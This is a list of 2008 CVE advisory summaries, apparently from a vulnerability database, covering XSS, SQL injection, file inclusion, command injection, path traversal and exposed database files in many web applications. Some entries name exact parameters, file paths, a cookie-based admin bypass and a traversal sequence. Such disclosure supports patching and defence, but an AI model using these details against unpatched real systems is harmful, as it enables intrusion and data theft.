[CVE-2008-6978] Unrestricted file upload vulnerability in Full Revolution aspWebAlbum 3.2 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in pics/, related to the uploadmedia action in album.asp.
[CVE-2008-6977] Cross-site scripting (XSS) vulnerability in album.asp in Full Revolution aspWebAlbum 3.2 allows remote attackers to inject arbitrary web script or HTML via the message parameter in a summary action.
[CVE-2008-6973] Multiple unspecified vulnerabilities in IBM WebSphere Commerce 6.0 before 6.0.0.7 have unknown impact and attack vectors.
[CVE-2008-6972] Multiple cross-site scripting (XSS) vulnerabilities in Drupal Content Construction Kit (CCK) 5.x through 5.x-1.8 allow remote authenticated users with "administer content" permissions to inject arbitrary web script or HTML via the (1) "field label," (2) "help text," or (3) "allowed values" settings.
[CVE-2008-6969] Multiple cross-site scripting (XSS) vulnerabilities in checkout.php in Avactis Shopping Cart 1.8.0 and 1.8.1 allow remote attackers to inject arbitrary web script or HTML via the (1) step_id and (2) CHECKOUT_CZ_BLOWFISH_KEY parameters.
[CVE-2008-6965] AJ Square AJ Auction OOPD, Pro Platinum Skin #1, Pro Platinum Skin #2, and Web 2.0 send a redirect but do not exit when certain scripts are called directly, which allows remote attackers to bypass authentication via a direct request to (1) site.php, (2) auction.php, (3) mail.php, (4) fee_setting.php, (5) earnings.php, (6) insertion_fee_settings.php, (7) custom_category.php, (8) subcategory.php, (9) category.php, (10) report.php, (11) store_manager.php, and (12) choose_sell_format.php in admin/, and possibly other vectors.
[CVE-2008-6955] mxCamArchive 2.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain configuration details and passwords via a direct request for archive/config.ini.
[CVE-2008-6950] Multiple SQL injection vulnerabilities in login.asp in Bankoi WebHosting Control Panel 1.20 allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password field.
[CVE-2008-6946] Cross-site scripting (XSS) vulnerability in manageproject.php in Collabtive 0.4.8 allows user-assisted remote attackers to inject arbitrary web script or HTML via the project Name, which is not properly handled when the administrator performs an editform action, related to admin.php.
[CVE-2008-6945] Multiple cross-site scripting (XSS) vulnerabilities in Interchange 5.7 before 5.7.1, 5.6 before 5.6.1, and 5.4 before 5.4.3 allow remote attackers to inject arbitrary web script or HTML via (1) the mv_order_item CGI variable parameter in Core, (2) the country-select widget, or (3) possibly the value specifier when used in the UserTag feature.
[CVE-2008-6941] SQL injection vulnerability in the login functionality in TurnkeyForms Web Hosting Directory allows remote attackers to execute arbitrary SQL commands via the password field.
[CVE-2008-6940] TurnkeyForms Web Hosting Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain a database backup via a direct request to admin/backup/db.
[CVE-2008-6939] TurnkeyForms Web Hosting Directory allows remote attackers to bypass authentication and (1) gain administrative privileges by setting the adm cookie to 1 or (2) gain privileges as another user by setting the logged cookie to the target username.
[CVE-2008-6938] Pi3Web 2.0.3 before PL2, when installed on Windows as a desktop application and without using the Pi3Web/Conf/Intenet.pi3, allows remote attackers to cause a denial of service (crash or hang) and obtain the full pathname of the server via a request to a file in the ISAPI directory that is not an executable DLL, which triggers the crash when the DLL load fails, as demonstrated using Isapi\users.txt.
[CVE-2008-6927] Multiple cross-site scripting (XSS) vulnerabilities in autoinstall4imagesgalleryupgrade.php in the Fantastico De Luxe Module for cPanel allow remote attackers to inject arbitrary web script or HTML via the (1) localapp, (2) updatedir, (3) scriptpath_show, (4) domain_show, (5) thispage, (6) thisapp, and (7) currentversion parameters in an Upgrade action.
[CVE-2008-6925] Cross-site scripting (XSS) vulnerability in function.php in Zenphoto 1.1.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the "request logging" feature. NOTE: the provenance of this information is unknown.
[CVE-2008-6924] Multiple cross-site scripting (XSS) vulnerabilities in register.php in eSyndiCat Directory 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) email, (3) password, (4) password2, (5) security_code, and (6) register parameters.
[CVE-2008-6915] Cross-site scripting (XSS) vulnerability in view_prop_details.php in Zeeways ZEEPROPERTY 1.0 allows remote attackers to inject arbitrary web script or HTML via the propid parameter.
[CVE-2008-6906] Cross-site scripting (XSS) vulnerability in index.php in BabbleBoard 1.1.6 allows remote attackers to inject arbitrary web script or HTML via the username.
[CVE-2008-6898] Buffer overflow in the XHTTP Module 4.1.0.0 in the ActiveX control for SaschArt SasCam Webcam Server 2.6.5 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long argument to the Get method and other unspecified methods.
[CVE-2008-6894] Multiple cross-site scripting (XSS) vulnerabilities in login.php in 3CX Phone System Free Edition 6.1793 and 6.0.806.0 allow remote attackers to inject arbitrary web script or HTML via the (1) fName and (2) fPassword parameters.
[CVE-2008-6893] Cross-site scripting (XSS) vulnerability in Alt-N MDaemon WorldClient 10.0.2, when Internet Explorer 7 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted img tag.
[CVE-2008-6891] Multiple cross-site scripting (XSS) vulnerabilities in ASP Forum Script allow remote attackers to inject arbitrary web script or HTML via the (1) forum_id parameter to (a) new_message.asp and (b) messages.asp, and the (2) query string to default.asp.
[CVE-2008-6888] Cross-site scripting (XSS) vulnerability in signup.asp in Pre Classified Listings 1.0 allows remote attackers to inject arbitrary web script or HTML via the address parameter.
[CVE-2008-6885] Cross-site scripting (XSS) vulnerability in pmlite.php in XOOPS 2.3.1 and 2.3.2a allows remote attackers to inject arbitrary web script or HTML via a STYLE attribute in a URL BBcode tag in a private message.
[CVE-2008-6880] SQL injection vulnerability in joke.php in EasySiteNetwork Free Jokes Website allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
[CVE-2008-6876] Cross-site scripting (XSS) vulnerability in login.php in EsPartenaires 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the EsContacts 1.0 issue is covered in CVE-2008-2037.
[CVE-2008-6873] SQL injection vulnerability in Active Web Mail 4.0 allows remote attackers to execute arbitrary SQL commands via the TabOpenQuickTab1 parameter to (1) popaccounts.aspx, (2) addressbook.aspx, and (3) emails.aspx.
[CVE-2008-6872] ASPThai.NET ASPThai Forums 8.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/aspthaiForum.mdb.
[CVE-2008-6871] Merlix Educate Server stores db.mdb under the web root with insufficient access control, which allows remote attackers to obtain unspecified sensitive information via a direct request.
[CVE-2008-6869] Oramon Oracle Database Monitoring Tool 2.0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for config/oramon.ini.
[CVE-2008-6868] Cross-site scripting (XSS) vulnerability in default/login.php in EditeurScripts EsBaseAdmin 2.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the EsContacts 1.0 issue is covered in CVE-2008-2037.
[CVE-2008-6850] Cross-site scripting (XSS) vulnerability in messages.php in PHP-Fusion 6.01.17 and 7.00.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6848] Cross-site scripting (XSS) vulnerability in index.php in phpGreetCards 3.7 allows remote attackers to inject arbitrary web script or HTML via the category parameter in a select action.
[CVE-2008-6847] Cross-site scripting (XSS) vulnerability in Employee/emp_login.asp in Pre ASP Job Board allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2008-6840] Multiple PHP remote file inclusion vulnerabilities in V-webmail 1.6.4 allow remote attackers to execute arbitrary PHP code via a URL in the (1) CONFIG[pear_dir] parameter to (a) Mail/RFC822.php, (b) Net/Socket.php, (c) XML/Parser.php, (d) XML/Tree.php, (e) Mail/mimeDecode.php, (f) Console/Getopt.php, (g) System.php, (h) Log.php, and (i) File.php in includes/pear/.
[CVE-2008-6839] Multiple cross-site scripting (XSS) vulnerabilities in TGS Content Management 0.3.2r2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg and (2) goodmsg parameters to (a) login.php and (b) index.php, and the (3) dir and (4) id parameters to index.php. NOTE: the provenance of this information is unknown.
[CVE-2008-6838] Cross-site scripting (XSS) vulnerability in search.php in Zoph 0.7.2.1 allows remote attackers to inject arbitrary web script or HTML via the _off parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6835] Cross-site scripting (XSS) vulnerability in OpenID 5.x before 5.x-1.2, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6831] Multiple cross-site scripting (XSS) vulnerabilities in Atlassian JIRA Enterprise Edition 3.13 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname (Full Name) parameter in the ViewProfile page or (2) returnUrl parameter in a form, as demonstrated using secure/AddComment!default.jspa (aka "Add Comment").
[CVE-2008-6824] The management interface on the A-LINK WL54AP3 and WL54AP2 access points has a blank default password for the admin account, which makes it easier for remote attackers to obtain access.
[CVE-2008-6823] Multiple cross-site request forgery (CSRF) vulnerabilities in the management interface on the A-LINK WL54AP3 and WL54AP2 access points before firmware 1.4.2-eng1 allow remote attackers to hijack the authentication of administrators for requests that (1) modify the network configuration via certain parameters to goform/formWanTcpipSetup or (2) modify credentials via certain parameters to goform/formPasswordSetup.
[CVE-2008-6813] SQL injection vulnerability in index.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the id_kat parameter.
[CVE-2008-6812] SQL injection vulnerability in bukutamu.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the det parameter.
[CVE-2008-6770] YourPlace 1.0.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain a database containing user credentials via a direct request for users.txt.
[CVE-2008-6764] Cross-site scripting (XSS) vulnerability in login.php in Silentum LoginSys 1.0.0 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2008-6762] Open redirect vulnerability in wp-admin/upgrade.php in WordPress, probably 2.6.x, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the backto parameter.
[CVE-2008-6757] Cross-site scripting (XSS) vulnerability in manuals_search.php in ViArt Shop (aka Shopping Cart) 3.5 allows remote attackers to inject arbitrary web script or HTML via the manuals_search parameter.
[CVE-2008-6746] Cross-site scripting (XSS) vulnerability in the contact display view in Turba Contact Manager H3 before 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the contact name.
[CVE-2008-6734] Directory traversal vulnerability in Public/index.php in Keller Web Admin CMS 0.94 Pro allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the action parameter.
[CVE-2008-6733] Cross-site scripting (XSS) vulnerability in the error handling page in DotNetNuke 4.6.2 through 4.8.3 allows remote attackers to inject arbitrary web script or HTML via the querystring parameter.
[CVE-2008-6732] Cross-site scripting (XSS) vulnerability in the Language skin object in DotNetNuke before 4.8.4 allows remote attackers to inject arbitrary web script or HTML via "newly generated paths."
[CVE-2008-6727] Cross-site scripting (XSS) vulnerability in Ultimate PHP Board (UPB) 2.2.2, 2.2.1, and earlier 2.x versions allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2008-6724] Cross-site scripting (XSS) vulnerability in index.pl in Perl Nopaste 1.0 allows remote attackers to inject arbitrary web script or HTML via the language parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
[CVE-2008-6715] Multiple cross-site scripting (XSS) vulnerabilities in Pre ADS Portal 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) homeadmin/adminhome.php and (2) homeadmin/signinform.php.
[CVE-2008-6700] Multiple cross-site scripting (XSS) vulnerabilities in Butterfly Organizer 2.0.0 allow remote attackers to inject arbitrary web script or HTML via the (1) mytable parameter to view.php, (2) mytable parameter to viewdb2.php, (3) tablehere parameter to category-rename.php, and (4) letter parameter to module-contacts.php.
[CVE-2008-6699] Cross-site scripting (XSS) vulnerability in Resource Library (tjs_reslib) 0.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-6698] Cross-site scripting (XSS) vulnerability in TARGET-E WorldCup Bets (worldcup) 2.0.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-6688] Cross-site scripting (XSS) vulnerability in JobControl (dmmjobcontrol) 1.15.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-6687] Cross-site scripting (XSS) vulnerability in DCD GoogleMap (dcdgooglemap) 1.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-6683] Cross-site scripting (XSS) vulnerability in listtest.php in Apartment Search Script allows remote attackers to inject arbitrary web script or HTML via the r parameter.
[CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
[CVE-2008-6681] Cross-site scripting (XSS) vulnerability in dijit.Editor in Dojo before 1.1 allows remote attackers to inject arbitrary web script or HTML via XML entities in a TEXTAREA element.
[CVE-2008-6675] Multiple cross-site scripting (XSS) vulnerabilities in QuickerSite 1.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the close parameter to showThumb.aspx
[CVE-2008-6669] viewrq.php in nweb2fax 0.2.7 and earlier allows remote attackers to execute arbitrary code via shell metacharacters in the var_filename parameter in a (1) tif or (2) pdf format action.
[CVE-2008-6668] Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) id parameter to comm.php and (2) var_filename parameter to viewrq.php.
[CVE-2008-6666] Multiple cross-site scripting (XSS) vulnerabilities in Kronos webTA allow remote attackers to inject arbitrary web script or HTML via the description field to (1) servlet/com.threeis.webta.H710selProject and (2) servlet/com.threeis.webta.H720editProjectInfo. NOTE: BID:29610 states that the initial report was incorrect, but the reason for this conclusion is unknown.
[CVE-2008-6655] Multiple cross-site scripting (XSS) vulnerabilities in GEDCOM_TO_MYSQL 2 allow remote attackers to inject arbitrary web script or HTML via the (1) nom_branche and (2) nom parameters to php/prenom.php.
[CVE-2008-6654] Cross-site scripting (XSS) vulnerability in search_results.php in InfoBiz Server allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2008-6653] SQL injection vulnerability in webhosting.php in the Webhosting Component (com_webhosting) module before 1.1 RC7 for Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the catid parameter to index.php.
[CVE-2008-6646] Cross-site scripting (XSS) vulnerability in index.php in CoronaMatrix phpAddressBook 2.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2008-6645] Cross-site scripting (XSS) vulnerability in Opencosmo VisualSentinel 0.7 allows remote attackers to inject arbitrary web script or HTML via the User-Agent header ($_SERVER ['HTTP_USER_AGENT']), which is not properly handled when displaying log files.
[CVE-2008-6644] Cross-site scripting (XSS) vulnerability in Default.aspx in DotNetNuke 4.8.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2008-6637] Multiple cross-site scripting (XSS) vulnerabilities in forgotPW.php in Library Video Company SAFARI Montage 3.1.x allow remote attackers to inject arbitrary web script or HTML via the (1) school and (2) email parameters.
[CVE-2008-6631] Multiple cross-site scripting (XSS) vulnerabilities in index.php in BlogPHP 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) user parameter in a sendmessage action and the (2) username parameter when registering a new user, different vectors than CVE-2008-0679.
[CVE-2008-6629] Cross-site scripting (XSS) vulnerability in detail.php in WEBBDOMAIN Multi Languages WebShop Online 1.02 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2008-6627] SQL injection vulnerability in getin.php in WEBBDOMAIN WebShop 1.2, 1.1, 1.02, and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2008-6626] SQL injection vulnerability in getin.php in WEBBDOMAIN Quiz 1.02 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2008-6625] SQL injection vulnerability in getin.php in WEBBDOMAIN Polls (aka Poll) 1.0 and 1.01 allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2008-6624] SQL injection vulnerability in getin.php in WEBBDOMAIN Petition 1.02, 2.0, and 3.0 allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2008-6623] SQL injection vulnerability in getin.php in WEBBDOMAIN Post Card (aka Web Postcards) 1.02 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2008-6622] SQL injection vulnerability in choosecard.php in WEBBDOMAIN Post Card (aka Web Postcards) 1.02, 1.01, and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2008-6620] Multiple cross-site scripting (XSS) vulnerabilities in javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php in GraFX miniCWB 2.1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) errcontext, (2) _GET, (3) _POST, (4) _SESSION, (5) _SERVER, and (6) fckphp_config[Debug_SERVER] parameters.
[CVE-2008-6616] Cross-site scripting (XSS) vulnerability in index.php in Zen Software Zen Cart 2008 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in the advanced_search_result page. NOTE: the provenance of this information is unknown.
[CVE-2008-6609] Cross-site scripting (XSS) vulnerability in phpcksec.php in Stefan Ott phpcksec 0.2 allows remote attackers to inject arbitrary web script or HTML via the path parameter.
[CVE-2008-6607] Cross-site scripting (XSS) vulnerability in view.php in MatPo Link 1.2 Beta allows remote attackers to inject arbitrary web script or HTML via the thema parameter.
[CVE-2008-6600] Cross-site scripting (XSS) vulnerability in the search feature in XMLPortal 3.0 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2008-6599] cookiecheck.php in CookieCheck 1.0 stores tmp/cc_sessions under the web root with insufficient access control, which allows remote attackers to obtain session data via a direct request related to the "default session save path."
[CVE-2008-6597] Cross-site scripting (XSS) vulnerability in upload/install/index.php in PHCDownload 1.1 allows remote attackers to inject arbitrary web script or HTML via the step parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6589] Multiple cross-site scripting (XSS) vulnerabilities in LightNEasy "no database" (aka flat) version 1.2.2, and possibly SQLite version 1.2.2, allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) index.php and (2) LightNEasy.php.
[CVE-2008-6587] Cross-site request forgery (CSRF) vulnerability in index.tmpl in Vuze (formerly Azureus HTML WebUI), probably 0.7.6, allows remote attackers to hijack the authentication of users for requests that force the download of arbitrary torrent files via the upurl parameter.
[CVE-2008-6586] Cross-site request forgery (CSRF) vulnerability in gui/index.php in µTorrent (uTorrent) WebUI 0.315 allows remote attackers to (1) hijack the authentication of users for requests that force the download of arbitrary torrent files via the add-url action and (2) hijack the authentication of administrators for requests that modify the administrator account via the setsetting action.
[CVE-2008-6582] SQL injection vulnerability in index.php in Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the username parameter in a login action.
[CVE-2008-6580] The Red_Reservations script for ColdFusion stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database via a direct request to (1) makered.mdb and (2) makered97.mdb.
[CVE-2008-6579] Nortel Communication Server 1000 4.50.x allows remote attackers to obtain Web application structure via unknown vectors related to "web resources to phones and administrators."
[CVE-2008-6571] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.3.4 might allow remote attackers to inject arbitrary web script or HTML via (1) new_images.php, (2) login.php, and unspecified vectors.
[CVE-2008-6570] Cross-site scripting (XSS) vulnerability in the RSS reader in Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to inject arbitrary web script or HTML via a crafted RSS feed.
[CVE-2008-6569] Session fixation vulnerability in Cybozu Garoon 2.0.0 through 2.1.3 allows remote attackers to hijack web sessions via the session ID in the login page.
[CVE-2008-6567] Multiple cross-site scripting (XSS) vulnerabilities in Gallarific Free Edition allow remote attackers to inject arbitrary web script or HTML via (1) the e-mail address, (2) a comment, which is not properly handled during moderation, and (3) the tag parameter to gallery/tags.php.
[CVE-2008-6565] Cross-site scripting (XSS) vulnerability in Invision Power Board 2.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via an IFRAME tag in the signature.
[CVE-2008-6562] Cross-site scripting (XSS) vulnerability in jax_linklists.php in Jack (tR) Jax LinkLists 1.00 allows remote attackers to inject arbitrary web script or HTML via the cat parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6557] cgi-bin/webutil.pl in The Puppet Master WebUtil 2.7 allows remote attackers to execute arbitrary commands via shell metacharacters in the details command.
[CVE-2008-6556] cgi-bin/webutil.pl in The Puppet Master WebUtil 2.3 allows remote attackers to execute arbitrary commands via shell metacharacters in the whois command.
[CVE-2008-6555] cgi-bin/webutil.pl in The Puppet Master WebUtil allows remote attackers to execute arbitrary commands via shell metacharacters in the dig command.
[CVE-2008-6550] Cross-site scripting (XSS) vulnerability in glossaire.php in Glossaire 2.0 allows remote attackers to inject arbitrary web script or HTML via the letter parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6545] PHP remote file inclusion vulnerability in news/include/createdb.php in Web Server Creator Web Portal 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the langfile parameter. NOTE: the provenance of this information is unknown.
[CVE-2008-6540] DotNetNuke before 4.8.2, during installation or upgrade, does not warn the administrator when the default (1) ValidationKey and (2) DecryptionKey values cannot be modified in the web.config file, which allows remote attackers to bypass intended access restrictions by using the default keys.
[CVE-2008-6531] The WebWork 1 web application framework in Atlassian JIRA before 3.13.2 allows remote attackers to invoke exposed public JIRA methods via a crafted URL that is dynamically transformed into method calls, aka "WebWork 1 Parameter Injection Hole."
[CVE-2008-6529] Cross-site scripting (XSS) vulnerability in listtest.php in eZoneScripts Living Local 1.1 allows remote attackers to inject arbitrary web script or HTML via the r parameter.
[CVE-2008-6520] Multiple format string vulnerabilities in the SSI filter in Xitami Web Server 2.5c2, and possibly other versions, allow remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in a URI that ends in (1) .ssi, (2) .shtm, or (3) .shtml, which triggers incorrect logging code involving the sendfmt function in the SMT kernel.
[CVE-2008-6519] Format string vulnerability in Xitami Web Server 2.2a through 2.5c2, and possibly other versions, allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in a Long Running Web Process (LRWP) request, which triggers incorrect logging code involving the sendfmt function in the SMT kernel.
[CVE-2008-6515] Cross-site scripting (XSS) vulnerability in Fritz Berger yet another php photo album - next generation (yappa-ng) allows remote attackers to inject arbitrary web script or HTML via the query string to the default URI.
[CVE-2008-6511] Open redirect vulnerability in login.jsp in Openfire 3.6.0a and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
[CVE-2008-6510] Cross-site scripting (XSS) vulnerability in login.jsp in the Admin Console in Openfire 3.6.0a and earlier allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2008-6508] Directory traversal vulnerability in the AuthCheck filter in the Admin Console in Openfire 3.6.0a and earlier allows remote attackers to bypass authentication and access the admin interface via a .. (dot dot) in a URI that matches the Exclude-Strings list, as demonstrated by a /setup/setup-/.. sequence in a URI.
[CVE-2008-6503] Multiple cross-site scripting (XSS) vulnerabilities in PrestaShop 1.1.0.3 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin/login.php and (2) order.php.
[CVE-2008-6501] Cross-site scripting (XSS) vulnerability in profiles/index.php in Pro Chat Rooms 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the gud parameter.
[CVE-2008-6500] Cross-site scripting (XSS) vulnerability in CodeToad ASP Shopping Cart Script allows remote attackers to inject arbitrary web script or HTML via the query string to the default URI.
[CVE-2008-6495] Cross-site scripting (XSS) vulnerability in index.php in Fritz Berger yet another php photo album - next generation (yappa-ng) 2.3.2 allows remote attackers to inject arbitrary web script or HTML via the album parameter.
[CVE-2008-6494] ASP User Engine.NET stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for users.mdb.
[CVE-2008-6493] Easy Content Management Publishing stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for Database/News.mdb.
[CVE-2008-6476] Cross-site scripting (XSS) vulnerability in blog/search.aspx in BlogEngine.NET allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2008-6474] The management interface in F5 BIG-IP 9.4.3 allows remote authenticated users with Resource Manager privileges to inject arbitrary Perl code via unspecified configuration settings related to Perl EP3 with templates, probably triggering static code injection.
[CVE-2008-6465] Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
[CVE-2008-6455] Session fixation vulnerability in Edikon phpShop 0.8.1 allows remote attackers to hijack web sessions via unspecified vectors. NOTE: the provenance of this information is unknown.
[CVE-2008-6450] Cross-site scripting (XSS) vulnerability in Under Construction, Baby (UCB) PC2M 0.9.22.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-6448] Cross-site scripting (XSS) vulnerability in install.cgi in SKYARC System MTCMS WYSIWYG Editor allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6439] Cross-site scripting (XSS) vulnerability in search_results.php in ABK-Soft AbleDating 2.4 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2008-6437] Multiple cross-site scripting (XSS) vulnerabilities in PHPFreeForum 1.0 RC2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) message parameter to error.php, and the (2) nickname and (3) randomid parameters to part/menu.php.
[CVE-2008-6436] Cross-site scripting (XSS) vulnerability in the Web Server in Xerox WorkCentre 7132, 7228, 7235, and 7245 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-6435] Multiple cross-site scripting (XSS) vulnerabilities in phpSQLiteCMS 1 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) lang[home], (2) lang[admin_menu], and (3) lang[admin_menu_page_overview] parameters to cms/includes/header.inc.php.
[CVE-2008-6433] Cross-site scripting (XSS) vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action.
[CVE-2008-6431] Multiple cross-site scripting (XSS) vulnerabilities in BMForum 5.6 allow remote attackers to inject arbitrary web script or HTML via the (1) outpused parameter to index.php, the (2) footer_copyright and (3) verandproname parameters to newtem/footer/bsd01footer.php, and the (4) topads and (5) myplugin parameters to newtem/header/bsd01header.php.
[CVE-2008-6420] Social Site Generator (SSG) 2.0 allows remote attackers to read arbitrary files via the file parameter to (1) filedload.php, (2) webadmin/download.php, and (3) webadmin/download_file.php.
[CVE-2008-6416] Multiple cross-site scripting (XSS) vulnerabilities in GreenSQL-Console before 0.3.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "internal pages."
[CVE-2008-6413] Cross-site scripting (XSS) vulnerability in the Answers module 5.x-1.x-dev and possibly other 5.x versions, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a Simple Answer to a question.
[CVE-2008-6406] Cross-site scripting (XSS) vulnerability in admin.php in DataLife Engine (DLE) 7.2 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2008-6404] Cross-site scripting (XSS) vulnerability in add_calendars.php in eXtrovert Software Thyme 1.3 allows remote attackers to inject arbitrary web script or HTML via the callback parameter.
[CVE-2008-6402] PHP remote file inclusion vulnerability in hu/modules/reg-new/modstart.php in Sofi WebGui 0.6.3 PRE and earlier allows remote attackers to execute arbitrary PHP code via a URL in the mod_dir parameter.
[CVE-2008-6401] SQL injection vulnerability in sayfa.php in JETIK-WEB allows remote attackers to execute arbitrary SQL commands via the kat parameter.
[CVE-2008-6400] Cross-site scripting (XSS) vulnerability in refbase before 0.9.5 allows remote attackers to inject arbitrary web script or HTML via the headerMsg parameter to (1) show.php and (2) search.php. NOTE: some of these details are obtained from third party information.
[CVE-2008-6396] Cross-site scripting (XSS) vulnerability in account.php in Celerondude Uploader 6.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-6388] Rapid Classified 3.1 and 3.15 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to cldb.mdb.
[CVE-2008-6387] Quick Tree View .NET 3.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to qtv.mdb.
[CVE-2008-6386] Cross-site scripting (XSS) vulnerability in showads.php in Z1Exchange 1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-6385] Cross-site scripting (XSS) vulnerability in index.php in W3matter RevSense 1.0 allows remote attackers to inject arbitrary web script or HTML via the section parameter.
[CVE-2008-6382] ASP Portal 3.2.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to ASPPortal.mdb.
[CVE-2008-6380] SQL injection vulnerability in default.aspx in Active Web Helpdesk 2.0 allows remote attackers to execute arbitrary SQL commands via the CategoryID parameter.
[CVE-2008-6375] JBook stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to userids.mdb.
[CVE-2008-6374] CodefixerSoftware MailingListPro Free Edition stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to db/MailingList.mdb.
